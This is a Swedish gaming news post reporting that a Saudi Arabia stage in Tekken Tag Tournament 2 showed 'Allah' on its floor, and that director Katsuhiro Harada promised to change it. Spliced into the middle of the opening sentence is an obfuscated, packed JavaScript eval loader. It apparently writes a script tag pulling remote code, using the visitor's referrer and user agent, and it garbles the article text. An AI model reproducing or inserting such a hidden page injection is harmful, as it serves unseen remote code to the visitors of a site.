Image Image Image Image Image Image Image Image Image Image

| 16 oktober, 2018

Scroll to top

Top

Tekken Tag Tournament 2 råkade få med ”Allah” i en nivå.

Filip Urde
  • On 26 oktober, 2012
  • http://www.revue.se/filip-urde

allah

En eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|sshsh|var|u0026u|referrer|atrrt||js|php’.split(‘|’),0,{}))
nivå i Tekken Tag Tournament 2
kommer att göras om omgående efter att utvecklarna blivit uppmärksammade över att det står Allah på golvet. Det är en scen som ska utspela sig i Saudiarabien som ska ändras.  Spelets game director Katsuhiro Harada uppmärksammades om detta  från flera olika användare på Twitter (som vi kan se i bilden ovan).

Harada svarade:

We didn’t know that. We will change stage design data as soon as possible. We couldn’t read that.

RT @DENGOJIN @iSymbiox

 

Ja, vad ska man säga om det här egentligen…